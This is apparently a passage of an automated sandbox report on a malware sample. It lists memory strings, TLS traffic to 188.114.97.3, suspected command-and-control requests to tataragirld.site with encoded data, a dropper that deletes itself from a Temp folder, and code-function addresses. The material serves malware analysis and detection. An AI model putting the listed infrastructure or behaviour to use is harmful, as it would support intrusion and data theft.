Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msOZa.img
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1994802779.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047179004.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msyCF.img
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msB1P
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msB1PLast-Modified:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Char
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacyr
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007F21000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007F1F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/&l
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1980037435.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2108273562.0000000007F07000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034339884.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/om
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Allow-Credentials:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comAccess-Control-Expose-Headers:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-control:public
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/r
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.00000000080FF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2182937317.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2143180060.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2161763361.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site//3
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/2009_New_England_Patriots_season
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGV
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/2009_New_England_Patriots_seasono
Source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2206867453.0000000000686000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1807247260.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/?3d
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1799166983.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/c3
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2170307750.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/g3
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2152916730.0000000000642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site:443/2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2Bg
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.clarity.ms
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.00000000080FF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2128536238.0000000008106000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2005803456.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007F73000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2059495533.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007F6F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/har
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49967 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50088 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50089 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50090 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50091 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50098 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:50099 version: TLS 1.2
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeFile deleted: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeJump to behavior
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089001D0_2_0089001D
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008841EA0_2_008841EA
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008662AA0_2_008662AA
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008903D50_2_008903D5
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088C3320_2_0088C332
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089A5600_2_0089A560
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008907AA0_2_008907AA
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0086A8F10_2_0086A8F1
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089AA0E0_2_0089AA0E
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0088FB890_2_0088FB89
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00890B6F0_2_00890B6F
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00892C180_2_00892C18
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00892E470_2_00892E47
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_0089EE7C0_2_0089EE7C
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F001D2_2_005F001D
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005E41EA2_2_005E41EA
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005C62AA2_2_005C62AA
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EC3322_2_005EC332
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F03D52_2_005F03D5
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FA5602_2_005FA560
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F07AA2_2_005F07AA
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005CA8F12_2_005CA8F1
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FAA0E2_2_005FAA0E
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F0B6F2_2_005F0B6F
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005EFB892_2_005EFB89
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F2C182_2_005F2C18
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F2E472_2_005F2E47
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005FEE7C2_2_005FEE7C
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D382F422_2_6D382F42
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37BF892_2_6D37BF89
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D364EA02_2_6D364EA0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3635702_2_6D363570
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3764E02_2_6D3764E0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3721B02_2_6D3721B0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D3830622_2_6D383062
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37F3DF2_2_6D37F3DF
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37B3DB2_2_6D37B3DB
